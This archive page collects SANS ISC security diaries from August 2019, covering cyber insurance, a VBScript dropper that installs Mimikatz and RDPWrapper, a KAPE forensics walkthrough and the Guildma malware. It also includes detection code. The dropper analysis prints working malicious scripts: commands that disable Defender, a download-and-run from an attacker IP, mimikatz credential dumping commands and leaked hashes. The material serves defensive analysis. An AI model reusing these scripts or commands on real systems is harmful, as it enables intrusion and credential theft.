
Archive for August, 2019

Are there any Advantages of Buying Cyber Security Insurance?, (Sun, Aug 25th)

I was recently reading an article about cyber insurance and got intrigued by the type of coverage offered. Recovering from a cyber attack can be very expensive, and cyber security insurance offers the ability to transfer some of the risk to an insurance company. Some estimates say that 1 in 3 companies currently have cyber insurance. Then I found this presentation [2] that identified 10 misconceptions about cyber insurance and provided an answer to each of them. I found objection #1, "We outsource our IT services", very interesting: one of the three answers is that even if the data is outsourced, "Legal responsibility CANNOT be transferred by contract"; it is still the data the company has been entrusted to protect.

I started looking around and found several companies offering various types of coverage, ranging from:

  • Covering the direct costs of responding to an incident
  • Lawsuits or claims resulting from a cyber incident
  • Reputation management
  • Payment of regulatory fines

The policy cost will vary according to several factors such as the industry, the company size, past claims (if any), security in place, etc.

For example, the Equifax 2017 data breach cost them an estimated $1.4 billion [3], and they had only $125 million covered by insurance. In the past, this type of breach would probably have bankrupted the business.

I tried one of the cyber insurance websites [1] to get a basic quote for a small IT company with $1 million in liability, and the annual cost is $885 per year. Here is the result:

[1] https://www.zensurance.com/cyber-liability-insurance
[2] https://www.schinnerer.com/Content/Industries/Cyber/Documents/Cyber_Webinar_-_Overcoming_Cyber_Insurance_Objections.aspx
[3] https://www.databreaches.net/equifax-reaches-1-4-billion-data-breach-settlement-in-consumer-class-action-also-agrees-to-pay-575-million-as-part-of-settlement-with-ftc-cfpb-and-states-related-to-2017-data-breach/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.


Simple Mimikatz & RDPWrapper Dropper, (Thu, Aug 22nd)

Let's review a malware sample that I spotted a few days ago. I found it interesting because it is not using deep techniques to infect its victims. The initial sample is a malicious VBScript. For a few weeks, I have been hunting for more PowerShell based on encoded directives. The following regular expression matched on the file:

// New-Object
$enc09 = /(TmV\x33LU\x39iamVjd[A-P]|[\x2b\x2f-\x39A-Za-z][\x2b\x2f-\x39A-Za-z][\x31\x35\x39BFJNRVZdhlptx]OZXctT\x32JqZWN\x30[\x2b\x2f-\x39A-Za-z]|[\x2b\x2f-\x39A-Za-z][\x30EUk]\x35ldy\x31PYmplY\x33[Q-T])/
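The three alternatives above are the usual way of matching a keyword in each of its three possible base64 alignments. As an added example (not from the diary or its author), here is a small Python generator that derives such a pattern from any keyword: run on "New-Object" it reproduces the literals and character classes of the rule above (the rule lists the class members in a different order and appends one extra wildcard to the third alternative), and it can also widen the keyword to UTF-16LE, which is the encoding PowerShell's -EncodedCommand expects.

```python
import base64
import re

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
ANY_B64 = "[A-Za-z0-9+/]"  # a base64 character that carries no keyword bits


def _char_class(chars):
    """Regex fragment for an explicit set of base64 characters."""
    if len(chars) == 1:
        return "\\+" if chars[0] == "+" else chars[0]
    return "[" + "".join(chars) + "]"


def alignment_pattern(keyword, offset, utf16=False):
    """Regex fragment matching base64 text in which `keyword` starts `offset` (0..2)
    bytes into a 3-byte group.

    Each base64 character encodes 6 bits. A character whose 6 bits are all fixed by
    the keyword becomes a literal; one only partly covered (the first and last
    characters) becomes a character class of every alphabet entry whose known bits
    agree; a leading character holding no keyword bits at all becomes a wildcard.
    """
    data = keyword.encode("utf-16-le" if utf16 else "ascii")
    # Unknown bits (None) for the bytes preceding the keyword, then the keyword bits, MSB first.
    bits = [None] * (8 * offset) + [(b >> (7 - i)) & 1 for b in data for i in range(8)]
    parts = []
    for k in range(0, len(bits), 6):
        chunk = bits[k:k + 6]
        chunk += [None] * (6 - len(chunk))  # trailing bits belong to whatever follows
        if all(bit is None for bit in chunk):
            parts.append(ANY_B64)
            continue
        chars = [
            c for idx, c in enumerate(B64_ALPHABET)
            if all(bit is None or ((idx >> (5 - i)) & 1) == bit for i, bit in enumerate(chunk))
        ]
        parts.append(_char_class(chars))
    return "".join(parts)


def encoded_keyword_regex(keyword, utf16=False):
    """Compiled regex matching `keyword` in any of its three base64 alignments."""
    return re.compile("|".join(alignment_pattern(keyword, o, utf16) for o in range(3)))


if __name__ == "__main__":
    for offset in range(3):
        print(offset, alignment_pattern("New-Object", offset))
    sample = base64.b64encode(b"$c = New-Object System.Net.WebClient").decode()
    print(bool(encoded_keyword_regex("New-Object").search(sample)))
```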

The initial script (SHA256: bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5) is, still today, detected by only one AV engine [1]. Here is a beautified version of the script:

' Infection marker: if ID.dat already exists, the script deletes itself and exits
sDir = "C:\ProgramData\ID.dat"
Set oFSO = CreateObject("Scripting.FileSystemObject")
If oFSO.FileExists(sDir) Then
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    objFSO.DeleteFile WScript.ScriptFullName
    WScript.Quit()
Else
    ' Wait 333 seconds before doing anything (crude sandbox evasion)
    wscript.sleep(333000)
    Dim ShaDev
    set hfhejotgbhzlzyohafchtul = createobject("wscript.shell")
    ShaDev = hfhejotgbhzlzyohafchtul.ExpandEnvironmentStrings("%ProgramData%")
    ' Decode the embedded Base64 blob with MSXML and write it to disk with ADODB.Stream
    ' (this is the second-stage script, WindowsProtect.vbs)
    Set shadow=CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
    shadow.dataType="bin.base64"
    shadow.text="... [Base64 chunk of dat] ..."
    Set sexy=CreateObject("ADODB.Stream")
    sexy.Type=1
    sexy.Open
    sexy.Write shadow.nodeTypedValue
    sexy.SaveToFile ShaDev & "\WindowsProtect.vbs",2
    wscript.sleep(4000)

    ' Terminate every process whose name matches ProcessName, via WMI Win32_Process
    Sub KillAll(ProcessName)
        Dim objWMIService, colProcess
        Dim strComputer, strList, p
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
        Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process Where Name like '" & ProcessName & "'")
        For Each p in colProcess
            p.Terminate
        Next
    End Sub

    KillAll "cmd.exe"

    ' Run the second stage through cmd.exe with the "runas" verb (UAC prompt),
    ' retrying until a cmd.exe process is observed
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Do
        Running = False
        Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
        For Each objItem in colItems
            If objItem.Name = "cmd.exe" Then
                Running = True
                Exit For
            End If
        Next
        If Not Running Then
            Set objShell = CreateObject("Shell.Application")
            objShell.ShellExecute "cmd", "/k ""C:\ProgramData\WindowsProtect.vbs", "", "runas", 0
        End If
    Loop While Not Running
    WScript.Sleep 4000

    KillAll "cmd.exe"

    ' Drop the infection marker so later copies exit immediately
    Dim fso, MyFile
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set MyFile = fso.CreateTextFile("C:\ProgramData\ID.dat", True)
    MyFile.WriteLine(" ")
    MyFile.Close

    ' Self-delete
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    objFSO.DeleteFile WScript.ScriptFullName
    WScript.Quit()
End If

Not being obfuscated, its behaviour is easy to understand. First, it checks whether the victim has already been infected by looking for an 'ID.dat' file. If the file exists, the script deletes itself (WScript.ScriptFullName) and exits. Otherwise, a second-stage VBScript is decoded, dumped to disk and executed ('WindowsProtect.vbs'). Let's have a look at the second stage.

The decoded Base64 data (SHA256: 6a25a0dbc0627e36e307e87e677e307d08982720c3dbeffe9986c3c770c37fa8) is unknown on VT. Here is the script:

' Three PowerShell commands: disable Defender IOAV scanning, exclude the whole C: drive
' from Defender, then download the PE (served as a fake .mp3) and start it
Dim x
Dim y
Dim z
x = " Set-MpPreference -DisableIOAVProtection $true"
y = " Add-MpPreference -ExclusionPath 'C:\'"
z = " -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('hxxp://92[.]53[.]91[.]141/MP3/T0R.mp3','C:\ProgramData\Isass.exe');Start-Process 'C:\ProgramData\Isass.exe'"
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
command = ("powershell" & x )
commany = ("powershell" & y )
commanz = ("powershell" & z )
' Each command runs with a hidden window (style 0), with delays between them
objShell.Run command,0
wscript.sleep(4000)
objShell.Run commany,0
wscript.sleep(11000)
objShell.Run commanz,0
Set objShell = Nothing
wscript.sleep(4000)
' Self-delete
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile WScript.ScriptFullName
WScript.Quit

The next stage is, of course, the malicious PE file (SHA256: b5cc67c06f1352039209557aa8e62e1eabefaa4646fe449326bf50f62382eacd), which is also unknown on VT. It's a classic PE file:

# exiftool Isass.exe
ExifTool Version Number         : 9.46
File Name                       : Isass.exe
Directory                       : /tmp
File Size                       : 4.6 MB
File Modification Date/Time     : 2019:08:22 14:44:24-04:00
File Access Date/Time           : 2019:08:22 14:44:23-04:00
File Inode Change Date/Time     : 2019:08:22 14:44:24-04:00
File Permissions                : rw-r--r--
File Type                       : Win32 EXE
MIME Type                       : application/octet-stream
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2017:08:11 09:54:06-04:00
PE Type                         : PE32
Linker Version                  : 14.0
Code Size                       : 188928
Initialized Data Size           : 69632
Uninitialized Data Size         : 0
Entry Point                     : 0x1cec9
OS Version                      : 5.1
Image Version                   : 0.0
Subsystem Version               : 5.1
Subsystem                       : Windows GUI

The PDB path ('D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb') discloses that the PE file is a self-extracting archive. Program Database (PDB) files are used to keep debugging information about a program when it is compiled. The PDB stores a lot of interesting data such as symbols, addresses, names of resources, etc.

SFX files can execute a script once the content is unpacked. This is easy to spot in the PE strings:

# strings Isass.exe | grep Setup=
Setup=%SystemDrive%\Intel\Logs\h32.exe %SystemDrive%\Intel\Logs\beforeinstall.bat

Here is an extract of the script:

@echo off
REM Path separators were lost in the extracted text; the split of the two directory
REM names below (Intel\Logs and ProgramData\Microsoft\Windows\Updates) is assumed.
set CURRENTPATH=%SystemDrive%\Intel\Logs
set INSTALLPATH=%SystemDrive%\ProgramData\Microsoft\Windows\Updates

mkdir %INSTALLPATH%
del /F /Q %INSTALLPATH%\install.bat
move /Y %CURRENTPATH%\Tor  %INSTALLPATH%
move /Y %CURRENTPATH%\Data %INSTALLPATH%
move /Y %CURRENTPATH%\Service %INSTALLPATH%
move /Y %CURRENTPATH%\h64.exe %INSTALLPATH%\h64.exe
move /Y %CURRENTPATH%\h32.exe %INSTALLPATH%\h32.exe
move /Y %CURRENTPATH%\zip.exe %INSTALLPATH%\zip.exe
move /Y %CURRENTPATH%\ncftpput.exe %INSTALLPATH%\ncftpput.exe
move /Y %CURRENTPATH%\ftps.cfg %INSTALLPATH%\ftps.cfg
move /Y %CURRENTPATH%\install.bat %INSTALLPATH%\install.bat
move /Y %CURRENTPATH%\mimitask.bat %INSTALLPATH%\mimitask.bat

REM Pick the 32- or 64-bit "hide" launcher according to the CPU architecture
reg Query "HKLM\Hardware\Description\System\CentralProcessor" | find /i "x86" > NUL && set OS=32BIT || set OS=64BIT

if %OS%==32BIT set hidexe=h32.exe
if %OS%==64BIT set hidexe=h64.exe

cd %INSTALLPATH%
%hidexe% install.bat >> %INSTALLPATH%\Service\install.log 2>>&1

REM Clean up the extraction directory and the batch file itself
cd %CURRENTPATH%
rmdir /S /Q %CURRENTPATH%\Tor
rmdir /S /Q %CURRENTPATH%\Data
rmdir /S /Q %CURRENTPATH%\Tor
DEL /Q /F %CURRENTPATH%\Data
DEL /Q /F %CURRENTPATH%\Service
DEL /Q /F %CURRENTPATH%\h64.exe
DEL /Q /F %CURRENTPATH%\h32.exe
DEL /Q /F %CURRENTPATH%\zip.exe
DEL /Q /F %CURRENTPATH%\ncftpput.exe
DEL /Q /F %CURRENTPATH%\ftps.cfg
DEL /Q /F %CURRENTPATH%\install.bat
DEL /Q /F %CURRENTPATH%\mimitask.bat
rmdir /S /Q %CURRENTPATH%
DEL /Q /F  "%~f0" > NUL

You can see that many files are dropped on the infected computer. The more interesting ones are:

  • ncftpput.exe
  • ftps.cfg
  • mimitask.bat
  • install.bat
  • ToR package

The 'install.bat' script is also very interesting (SHA256: 550e8e6fcfc4db2139dfa2e6e4f26e881b405e21b752a750d4cc682da0361567) and also unknown on VT. It is too big to be posted here, but here is an overview of its features:

  • Check the geographical location of the victim via different GeoIP services
  • Create a new administrator user ('Admlnlstrator') with the following password: 'Zhopka222222'
  • Disable Windows Defender
  • Install the RDP Wrapper library [2]
  • Dump credentials via Mimikatz
  • Install a scheduled task to re-execute Mimikatz and exfiltrate data at each boot time.

The RDP Wrapper is fetched from another site: hxxp://yourdatafor[.]me:94/azaza/

Collected data is exfiltrated via FTP (FTP is still alive!) using the ncftpput.exe tool. The configuration is present in the archive in the ftps.cfg file:

# cat ftps.cfg
host etomakra.me
user ftpuser
pass Super123123

Yes, even attackers use weak passwords! The server is not protected and allows anyone to download all the files collected from victims. The domain 'etomakra.me' was registered on July 16th, 2019.

I synchronized them for a few days (the FTP server is now down). For each victim, two files were uploaded.

The first one contains the malware installation logs:

# unzip -t PLAYBOX1_RDP.zip
Archive:  PLAYBOX1_RDP.zip
    testing: Program Files/RDP Wrapper/hostname.log   OK
    testing: Program Files/RDP Wrapper/installer.log   OK
    testing: Program Files/RDP Wrapper/tor_install.log   OK
No errors detected in compressed data of PLAYBOX1_RDP.zip.

The second one contains the output of Mimikatz:

# unzip -t DESKTOP-UII5HVF_82742.zip
Archive:  DESKTOP-UII5HVF_82742.zip
    testing: ProgramData/Microsoft/NetFramework/Test/credoz.txt   OK
No errors detected in compressed data of DESKTOP-UII5HVF_82742.zip.

Each archive contains the same file ‘credoz.txt’:

# head -30 credoz.txt
Hostname: [redacted] / authority\system-authority\system

  .#####.   mimikatz 2.1.1 (x64) #17763 Feb 23 2019 12:03:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 2254335948 (00000000:865e6fcc)
Session           : RemoteInteractive from 2
User Name         : Admlnlstrator
Domain            : [redacted]
Logon Server      : [redacted]
Logon Time        : 2019/08/17 19:33:43
SID               : S-1-5-21-2984074050-2788484596-579673664-1006
        msv :
         [00000003] Primary
         * Username : Admlnlstrator
         * Domain   : [redacted]
         * NTLM     : eddcae2f04515b3a77e37ff4f5d2878d
         * SHA1     : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
         [00010000] CredentialKeys
         * NTLM     : eddcae2f04515b3a77e37ff4f5d2878d
         * SHA1     : 0a19e0af02162b596b2bc58f0c9f26c1ddfad698
        tspkg :
        wdigest :
         * Username : Admlnlstrator

You can see that the rogue administrator account has been used. In one week, I collected 188 credential files from the FTP server! Since new files are re-uploaded at every reboot, the number of unique victims is 53:

# ls -1 creds/*.zip|awk -F "_" '{ print $1 }'|sort -u|wc -l
53

Did you see the same kind of activity? Do you have more information about this malware? Feel free to share!

[1] https://www.virustotal.com/gui/file/bf06b682c637d470b15e3c7b76e6d25356719286cfcc75a12bf3c31be859d2b5/detection
[2] https://github.com/stascorp/rdpwrap/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key


KAPE: Kroll Artifact Parser and Extractor, (Wed, Aug 21st)

KAPE vs Commando, another Red vs Blue vignette

Once in a while the Twittersphere really sends me a signal regarding content opportunities and potential research areas. If you follow any Blue Team aficionados, as I do, you'll likely have seen the same level of chatter and excitement I have regarding Eric Zimmerman's KAPE, the Kroll Artifact Parser and Extractor. In short, KAPE is a triage program that targets devices or storage locations, finds forensic artifacts, and parses them.

Introduction
On the heels of last month's discussion of Commando VM, the system I implemented for that review serves us well to pit KAPE against Commando. To do so, I self-pwned and conducted adversarial activity using the Commando tool set, then utilized KAPE's intrinsic triage, identify, and parse capabilities.

Before the red versus blue walkthrough, a few key elements. KAPE's documentation is extensive, comprehensive, and effective. I'll not belabor our time here replicating much of what Eric has produced; as always, read the documentation before going too far in your KAPE testing and implementation.

Updating KAPE is as easy as

Get-KAPEUpdate.ps1

from a PowerShell prompt and

kape.exe --sync

from a command prompt.


Figure 1: KAPE update

You'll want to explore gkape, the KAPE graphical interface, simply because it will help you quickly enumerate all the target and module options and learn how to quickly build out your command-line payloads, including a Copy command feature.


Figure 2: gkape

In scenarios such as this, I'm particularly fond of !BasicCollection, CombinedLogs, EvidenceOfExecution, PowerShellConsole, and RegistryHives as Targets. For Modules, I utilize RegRipper-ALL (Registry); PowerShell and PECmd (ProgramExecution); all the tools in the LiveResponse category; WindowsEventLogs, SecurityEventFullLogView, PowerShellOperationalFullEventLogView and EvtxECmd (all under the EventLogs category); and SecurityEvents under AccountUsage. As I was writing this, Eric added Mini_Timeline and Mini_Timeline_Slice_By_Daterange, literally as I was thinking "Boy, a timeliner module would be pretty slick." Well done!

NOTE (MISSION CRITICAL): You will need to download tools and place them in KAPE\Modules\bin, including RegRipper (rip.exe), tln.exe and parse.exe from @keydet89's GitHub repo, Nirsoft and TZWorks binaries, and others you may wish to utilize. Note that you'll need p2x5124.dll for RegRipper and the Mini_Timeline tools; it should be in the same directory as each binary. You'll be warned amply to do so. When you execute a job, watch the shell too: missing tools will be called out in purple text. You can also review the console log, found under ModuleResults, after a run.

As I ran KAPE on the same dedicated host where I installed the Commando tool set last month, I simply set C: as my Target source and C:\tools\KAPE\localhost as my Target destination. Similarly, for Modules, I left Module source blank and set C:\tools\KAPE\localhost\ModuleResults as my Module destination.


RED: Commando – SharpDump

To pit KAPE versus Commando, I went back to the GhostPack well and compiled SharpDump. GhostPack is HarmJ0y's collection of security-related toolsets, and SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality. As with all the GhostPack tools included in Commando, you must compile them yourself; no binaries are provided. Much as we did last month with Seatbelt, utilize Visual Studio Community 2019 on , set up for Windows development (.NET, desktop, and UWP), and then open SharpDump.sln, found in C:\tools\GhostPack\SharpDump. Be sure to run Visual Studio as administrator for this step. In Solution Explorer, right-click SharpDump and select Build. You'll then find SharpDump.exe in C:\tools\GhostPack\SharpDump\SharpDump\bin\Release.

SharpDump, when executed, creates a debug output file, as seen in Figure 3.


Figure 3: SharpDump

The output file is written to C:\Windows\temp; mine was debug896.bin. Move it, rename it debug.gz, and decompress it. I did so in my SharpDump directory. To finish the adversarial process, you'll find mimikatz in C:\tools\Mimikatz\x64 on a Commando-enabled system. In the mimikatz console, I changed directory to my SharpDump release folder and ran

sekurlsa::minidump debug896
sekurlsa::logonPasswords full

The result is seen in Figure 4.


Figure 4: mimikatz

Congratulations, you have created a more than sufficient amount of malicious artifacts to identify with KAPE for the Blue part of this exploration.


BLUE: KAPE

As we're working through an arbitrary scenario here, we already have what could be considered IOCs. Loosely translated, your threat intel or SOC team would likely escalate with something akin to intel or telemetry indicating that a potential adversary created a dump file of all process memory on disk and used mimikatz to acquire identity artifacts. I set up a KAPE run as described above; it's mighty quick (Figure 5).

Figure 5: KAPE run

Results awaited me in C:\tools\KAPE\localhost\ModuleResults, per my configuration. Events of interest were immediately discoverable in the EventLogs, LiveResponse, and ProgramExecution folders. The first artifacts of malfeasance related to our SharpDump scenario come via the Sysinternals Handle viewer results found in LiveResponse. Prior to the actual execution of SharpDump, the adversary (me, knucklehead that he is) chose to compile SharpDump on the same system. 😉 Visual Studio creates a SQLite database in the compiled project folder. Figure 6 reveals all the related handle entries.


Figure 6: SharpDump handles

As an analyst/investigator, I consider timeline data absolutely essential. Eric’s PECmd results flourish in this regard. From ProgramExecution output, 20190817003023_PECmd_Output_Timeline.csv revealed the following entry, from many:

8/16/2019 21:04,\VOLUME{01d530564cd90cbb-a64cf119}\TOOLS\MIMIKATZ\X64\MIMIKATZ.EXE
8/16/2019 20:14,\VOLUME{01d530564cd90cbb-a64cf119}\TOOLS\GHOSTPACK\SHARPDUMP\SHARPDUMP\BIN\RELEASE\SHARPDUMP.EXE

This is spot on given that, when in red mode, I compiled SharpDump then walked away for almost an hour before coming back to run the dump through mimikatz.
Need more magic from full PECmd output? The full entry from 20190817003023_PECmd_Output.csv of the 21:04 mimikatz execution is evident in Figure 7.


Figure 7: PECmd mimikatz details

If you've enabled verbose PowerShell logging (if you haven't, shame on you) such that you get all the juicy details in Windows\system32\winevt\logs\Microsoft-Windows-PowerShell%4Operational.evtx, you'll find glorious results in EventLogs, 20190817002759_EvtxECmd_Output.csv in my case. Related results are seen in Figure 8.


Figure 8: EventID 4104

Behold the beauty of a snippet from a full content EventID 4104, with a whole lotta mimikatz. 🙂 Did I mention that turning on PowerShell logging yields invaluable results? Yes, I did, but let me really drive the point home with an additional scenario.

RED: Commando – PowerSploit tests

I love PowerSploit, and so do a plethora of jackalope script kiddies. Ever investigated compromised systems that have been stomped on by really loud, really unsophisticated interlopers? I thought I'd make the point in similarly noisy fashion, in the most simpleton manner. The PowerSploit framework includes an outstanding test suite to determine module success and failure. I lit the test suite up on my victim, as seen in Figure 9.


Figure 9: PowerSploit test scripts

The results were noisy, noisy, noisy, and again, with verbose PowerShell logging, a wonderful way to highlight a related KAPE module.

BLUE: KAPE

With verbose PowerShell script block logging enabled throughout your enterprise, you can spot a good bit of up-to-no-good. On the heels of the PowerSploit test scripts, I ran the configuration seen in Figure 10 to see what turned up. It runs Nirsoft's Full Event Log Viewer.


Figure 10: KAPE full event viewer config

The results, as expected, write to the EventLogs folder, as full_powershell_operational_event_log.csv.

The first hit in the results sums things up nicely. As part of the PowerSploit recon test suite, Invoke-StealthUserHunter was tested. In my case it failed and threw an error, but a small snippet of the entry from the PowerShell operational event log follows in Figure 11.

Figure 11: KAPE full event viewer results

As you can imagine, with the PowerSploit test suite there were plenty of script block log entries to follow. If your adversary attempts to use PowerShell modules from any of the well-known offensive PowerShell frameworks, you will spot them with PowerShell script block logging and KAPE during investigations. You should also be building detections on PowerShell-specific indicators found via script block logging.
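The dropper in the previous diary runs its Defender-tampering commands through powershell.exe, and the PowerSploit and mimikatz activity here shows up in EventID 4104 script block events, so both posts point at the same detection source. As an added example (not from either diary, nor part of KAPE), the Python below reassembles multi-part 4104 messages by ScriptBlock ID before matching a small indicator set drawn from both posts, so an indicator split across fragments is still caught and a block with missing parts is reported as incomplete; the events are constructed (block IDs and paths are made up) and follow the message layout Windows writes: header line, script text, blank line, ScriptBlock ID, Path.

```python
import re
from collections import defaultdict

# Indicator set drawn from the two diaries: the dropper's Defender-tampering
# PowerShell commands, the mimikatz sekurlsa module, and the PowerSploit recon function.
INDICATORS = {
    "defender_ioav_disabled": re.compile(r"Set-MpPreference\s+-DisableIOAVProtection\s+\$true", re.I),
    "defender_exclusion_added": re.compile(r"Add-MpPreference\s+-ExclusionPath\b", re.I),
    "mimikatz_sekurlsa": re.compile(r"sekurlsa::(?:logonpasswords|minidump)", re.I),
    "powersploit_userhunter": re.compile(r"Invoke-StealthUserHunter", re.I),
}

# Layout of a 4104 message: "Creating Scriptblock text (n of m):", the script text,
# a blank line, then "ScriptBlock ID: <guid>" and "Path: <script file, or empty>".
HEAD = re.compile(r"\ACreating Scriptblock text \((\d+) of (\d+)\):\r?\n")
TAIL = re.compile(r"\r?\n\r?\nScriptBlock ID: (\S+)\r?\nPath: .*\Z", re.S)

# Constructed sample events (IDs and paths are made up), deliberately out of order.
SAMPLE_EVENTS = [
    "Creating Scriptblock text (1 of 1):\n Set-MpPreference -DisableIOAVProtection $true"
    "\n\nScriptBlock ID: 11111111-1111-1111-1111-111111111111\nPath: ",
    "Creating Scriptblock text (1 of 1):\n Add-MpPreference -ExclusionPath 'C:\\'"
    "\n\nScriptBlock ID: 22222222-2222-2222-2222-222222222222\nPath: ",
    # A long script is logged in several parts; here the indicator straddles the split.
    "Creating Scriptblock text (2 of 2):\nUserHunter -Verbose\n}"
    "\n\nScriptBlock ID: 33333333-3333-3333-3333-333333333333\nPath: C:\\tools\\PowerSploit\\Tests\\Recon.tests.ps1",
    "Creating Scriptblock text (1 of 2):\nDescribe 'recon' {\n  Invoke-Stealth"
    "\n\nScriptBlock ID: 33333333-3333-3333-3333-333333333333\nPath: C:\\tools\\PowerSploit\\Tests\\Recon.tests.ps1",
    # Benign administrative query; must not be flagged.
    "Creating Scriptblock text (1 of 1):\nGet-MpPreference | Select-Object DisableIOAVProtection"
    "\n\nScriptBlock ID: 44444444-4444-4444-4444-444444444444\nPath: ",
    # Only one of three parts survived the export: still a hit, but reported as incomplete.
    "Creating Scriptblock text (2 of 3):\nInvoke-Mimikatz -Command 'sekurlsa::logonpasswords'"
    "\n\nScriptBlock ID: 55555555-5555-5555-5555-555555555555\nPath: ",
]


def parse_4104(message):
    """Return (part, total, block_id, fragment) for one 4104 message, or None if it
    does not follow the script block layout."""
    head = HEAD.match(message)
    tail = TAIL.search(message)
    if not head or not tail:
        return None
    return int(head.group(1)), int(head.group(2)), tail.group(1), message[head.end():tail.start()]


def reassemble(messages):
    """Group fragments by ScriptBlock ID and stitch them in part order.
    Returns {block_id: (script_text, complete)}; complete is False when parts are missing."""
    parts = defaultdict(dict)
    totals = {}
    for msg in messages:
        parsed = parse_4104(msg)
        if parsed is None:
            continue
        part, total, block_id, fragment = parsed
        parts[block_id][part] = fragment
        totals[block_id] = total
    blocks = {}
    for block_id, frags in parts.items():
        text = "".join(frags[i] for i in sorted(frags))
        blocks[block_id] = (text, len(frags) == totals[block_id])
    return blocks


def hunt(messages):
    """Match the indicator set against reassembled script blocks.
    Returns {block_id: {"indicators": [...], "complete": bool}} for blocks with hits."""
    hits = {}
    for block_id, (text, complete) in reassemble(messages).items():
        names = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        if names:
            hits[block_id] = {"indicators": names, "complete": complete}
    return hits


if __name__ == "__main__":
    for block_id, hit in hunt(SAMPLE_EVENTS).items():
        print(block_id, hit)
```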

Conclusion

A few takeaways:

Read the actual module script content by double-clicking on it in gkape. You'll learn a lot, and it can help debug configurations as well. KAPE is a beast. To be fair, I did it almost no justice here; these are painfully simple scenarios. But I do hope they served to kick in your intrigue and lead you to explore Eric and team's magnificent work. Have fun; there are endless options, configurations, and opportunities to come in behind the Red Team and clean up all their rainbow unicorn skittles doodie.

Blue Team, you rock.
Cheers…until next time.


Guildma malware is now accessing Facebook and YouTube to keep up-to-date, (Tue, Aug 20th)

A new variant of the information stealer Guildma (aka Astaroth), which we analyzed last week, is accessing Facebook and YouTube to get a fresh list of its C2 servers. The C2 list is encrypted and hosted in two Facebook and three YouTube profiles maintained and constantly updated by the cybercriminals.

This innovative strategy is probably helping the current infections resist expected C2 takedowns, as access to Facebook and YouTube is usually allowed and not associated with malicious activity.

The ongoing campaign has 76 C2 servers (and counting), and its main target is South America, especially Brazil. An analysis of a different variant by Avast late last month [1] reported that 155,000 infections were blocked by their solution alone.

In this diary, we provide details on how Guildma employs its multiple-stage and evasion techniques from the infection to data exfiltration. 

Threat Analysis

Follow the numbers in blue in the diagram and the descriptions of each step below:

Threat Analysis Diagram

1. E-mail Phishing

As usual, the campaign starts with a phishing e-mail. The message supposedly comes from the MINISTÉRIO PÚBLICO FEDERAL of Brazil; it has no attachment but urges the user to click on a link. Take a look at the message:

E-mail Phishing

2. The phishing link

The phishing link takes the user to download a zip file. The downloaded zip contains another zip which, finally, contains an 'LNK' file. Once executed, the 'LNK' downloads and executes a JavaScript, as shown in the following image. The JavaScript file is downloaded from a 'cloudflareworkers.com' subdomain.

LNK downloading and executing a JavaScript

A good tool to analyze “LNK” files is LECmd by Eric Zimmerman [2].

3. The JavaScript

The JavaScript downloads 11 files hosted in different cloudflareworkers.com subdomains. The downloaded files are stored locally under the path "C:\Users\Public\Libraries\win32".

The cloudflareworkers.com subdomains are randomly selected during the JavaScript execution, probably for evasion and redundancy purposes.

JavaScript snippet

Most of the 11 files have disguised extensions, like JPG and GIF. However, only a few have meaningful content (halawxtz64a.dll and halawxtz64b.dll). These two files, concatenated, form a DLL that is loaded in the next stage. Most of the other files are encrypted using a custom algorithm.

4. DLL side loading

In this stage, a technique called DLL side-loading is employed, in which a legitimate program that intends to load its own legitimate DLLs ends up loading a malicious DLL with the same name from the current directory or from a specified path. Read more about DLL side-loading at [3].

The side-loading technique, in this case, is employed using the program "C:\Program Files (x86)\Internet Explorer\ExtExport.exe". ExtExport is a legitimate binary, part of the Internet Explorer installation, which loads DLLs named mozcrt19.dll, mozsqlite3.dll or sqlite3.dll from the path given as an argument. The perfect candidate for the job.

ExtExport is launched with the argument "C:\Users\Public\Libraries\win32", which contains the dropped files and the concatenation of the halawxtz64a.dll and halawxtz64b.dll files, as seen below.

DLL side-loading

5. Process Hollowing

Now, the malicious DLL running under the ExtExport process employs another evasive technique called Process Hollowing. Process Hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code [4]. 

The "process-hollowed" program in this scenario is "C:\Program Files\Diebold\Warsaw\unins000.exe". It is part of the Diebold Warsaw installation, a security suite widely used and installed on most systems used to access online banking in Brazil.

The content injected into the suspended unins000.exe process memory is the concatenation of the halawxtzxa.~ and halawxtzxb.~ files. After the memory injection, the process is resumed (ResumeThread), as seen in the following image.

Process Hollowing

6. Obtaining C2 addresses in an innovative way

There are some suspicious addresses hardcoded into the binaries; however, the C2 addresses used to exfiltrate data are obtained from Facebook and YouTube profiles maintained and constantly updated by the cybercriminals.

Take a look at the DNS requests to YouTube and Facebook shortly before a C2 name resolution.

YouTube and Facebook Requests

